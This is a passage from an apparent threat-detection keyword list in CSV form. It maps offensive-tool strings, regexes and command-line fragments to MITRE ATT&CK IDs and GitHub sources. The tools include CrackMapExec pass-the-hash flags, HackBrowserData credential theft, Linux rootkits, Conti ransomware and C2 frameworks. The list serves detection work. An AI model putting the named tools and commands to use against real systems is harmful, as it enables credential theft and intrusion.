Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*GSOCKET_SOCKS_IP=*",".{0,1000}GSOCKET_SOCKS_IP\=.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*GSOCKET_SOCKS_PORT=*",".{0,1000}GSOCKET_SOCKS_PORT\=.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket-1.*.tar.gz*",".{0,1000}gsocket\-1\..{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket-tor/*",".{0,1000}gsocket\-tor\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket-tor\*",".{0,1000}gsocket\-tor\\.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gs-root-shell-key.txt*",".{0,1000}gs\-root\-shell\-key\.txt.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gs-sftp -*",".{0,1000}gs\-sftp\s\-.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gtfobins*",".{0,1000}gtfobins.{0,1000}","offensive_tool_keyword","gtfobins","GTFOBins is a curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems malicious use of legitimate binaries","T1059 - T1068 - T1136","TA0002 - TA0005","N/A","N/A","POST Exploitation tools","https://gtfobins.github.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*GTFOBLookup*",".{0,1000}GTFOBLookup.{0,1000}","offensive_tool_keyword","GTFOBLookup","Offline command line lookup utility for GTFOBins and LOLBAS.","T1059 - T1110 - T1216 - T1220","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nccgroup/GTFOBLookup","1","1","N/A","N/A","3","237","39","2023-06-16T22:01:43Z","2019-09-23T16:00:18Z" "*gtfonow.py -a*",".{0,1000}gtfonow\.py\s\-a.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*gtworek/Priv2Admin*",".{0,1000}gtworek\/Priv2Admin.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1781","248","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" "*guardicore*monkey*",".{0,1000}guardicore.{0,1000}monkey.{0,1000}","offensive_tool_keyword","Github Username","Welcome to the Infection Monkey! 
The Infection Monkey is an open source security tool for testing a data centers resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server","T1566 - T1569 - T1570 - T1571 - T1572 - T1573","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/h0nus","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*guardicore/monkey*",".{0,1000}guardicore\/monkey.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*Guest User Policy: Guest users have the same access as members (most inclusive)*",".{0,1000}Guest\sUser\sPolicy\:\sGuest\susers\shave\sthe\ssame\saccess\sas\smembers\s\(most\sinclusive\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*guida.exe -*",".{0,1000}guida\.exe\s\-.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","5","450","65","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "*gunicorn ares:app*",".{0,1000}gunicorn\sares\:app.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" 
"*Gupt-Backdoor.ps1*",".{0,1000}Gupt\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Gupt-Backdoor.ps1*",".{0,1000}Gupt\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*gustanini/PowershellTools*",".{0,1000}gustanini\/PowershellTools.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg==*",".{0,1000}Gw3kg8e3ej4ai9wffn\%2Fd0uRqKzyaPfM2UFq\%2F8dWmoW4wnyKZhx07Bg\=\=.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*-H 
lm-hash:nt-hash*",".{0,1000}\-H\slm\-hash\:nt\-hash.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*-H 'LMHASH:NTHASH'*",".{0,1000}\-H\s\'LMHASH\:NTHASH\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*-H 'NTHASH'*",".{0,1000}\-H\s\'NTHASH\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*h2csmuggler --scan-list *",".{0,1000}h2csmuggler\s\-\-scan\-list\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*h2csmuggler -x * --test*",".{0,1000}h2csmuggler\s\-x\s.{0,1000}\s\-\-test.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*h3GywpDrP6gJEdZ6xbJbZZVFmvFZDCa4KcRd*",".{0,1000}h3GywpDrP6gJEdZ6xbJbZZVFmvFZDCa4KcRd.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" 
"*h3xduck/TripleCross*",".{0,1000}h3xduck\/TripleCross.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","1","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*h4ntu shell [powered by tsoi]*",".{0,1000}h4ntu\sshell\s\[powered\sby\stsoi\].{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*H4sIAAAAAAAEACVQ30vDMBB*",".{0,1000}H4sIAAAAAAAEACVQ30vDMBB.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*H4sIAAAAAAAEANy9CZwcRfU43tPd093Tc*",".{0,1000}H4sIAAAAAAAEANy9CZwcRfU43tPd093Tc.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*H4sIAAAAAAAEAOx9CVhTR9fw3CQkYScgqyAILsgm*",".{0,1000}H4sIAAAAAAAEAOx9CVhTR9fw3CQkYScgqyAILsgm.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*h8mail -*",".{0,1000}h8mail\s\-.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","1","8","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" "*h8mail -t *@*.*",".{0,1000}h8mail\s\-t\s.{0,1000}\@.{0,1000}\..{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*h8mail*",".{0,1000}h8mail.{0,1000}","offensive_tool_keyword","h8mail","h8mail is an email OSINT and breach hunting tool using different breach and reconnaissance 
services. or local breaches such as Troy Hunts Collection1 and the infamous Breach Compilation torrent","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/khast3x/h8mail","1","0","N/A","N/A","10","3925","497","2023-08-15T10:50:34Z","2018-06-15T02:47:00Z" "*Ha3MrX/Gemail-Hack*",".{0,1000}Ha3MrX\/Gemail\-Hack.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","10","929","368","2024-01-17T15:12:44Z","2018-04-19T13:48:41Z" "*haad/proxychains*",".{0,1000}haad\/proxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*haad/proxychains*",".{0,1000}haad\/proxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*hackbrowersdata.cna*",".{0,1000}hackbrowersdata\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*hack-browser-data.exe*",".{0,1000}hack\-browser\-data\.exe.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","10012","1478","2024-05-01T17:51:49Z","2020-06-18T03:24:31Z" "*hack-browser-data/*",".{0,1000}hack\-browser\-data\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","94","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" "*Hackcraft-Labs/SharpShares*",".{0,1000}Hackcraft\-Labs\/SharpShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*Hacked by Skenda Unikkatil*",".{0,1000}Hacked\sby\sSkenda\sUnikkatil.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*hacked_getdents64(*",".{0,1000}hacked_getdents64\(.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*hacked_kill(*",".{0,1000}hacked_kill\(.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - 
TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*HACKER*FUCKER*Xeroxxx*",".{0,1000}HACKER.{0,1000}FUCKER.{0,1000}Xeroxxx.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*hackerhouse-opensource/OffensiveLua*",".{0,1000}hackerhouse\-opensource\/OffensiveLua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*hackerhouse-opensource/SignToolEx*",".{0,1000}hackerhouse\-opensource\/SignToolEx.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" 
"*hackerschoice/gsocket*",".{0,1000}hackerschoice\/gsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*hackerschoice/gsocket-relay*",".{0,1000}hackerschoice\/gsocket\-relay.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*hackertarget-get-rootdomains *",".{0,1000}hackertarget\-get\-rootdomains\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*hackingtool.py*",".{0,1000}hackingtool\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*Hackndo/sprayhound*",".{0,1000}Hackndo\/sprayhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Hackndo/sprayhound*",".{0,1000}Hackndo\/sprayhound.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*hackndo@gmail.com*",".{0,1000}hackndo\@gmail\.com.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*Hackplayers/evil-winrm*",".{0,1000}Hackplayers\/evil\-winrm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*hackrf_sweep -f *",".{0,1000}hackrf_sweep\s\-f\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*hacksysteam/CVE-2023-*",".{0,1000}hacksysteam\/CVE\-2023\-.{0,1000}","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - 
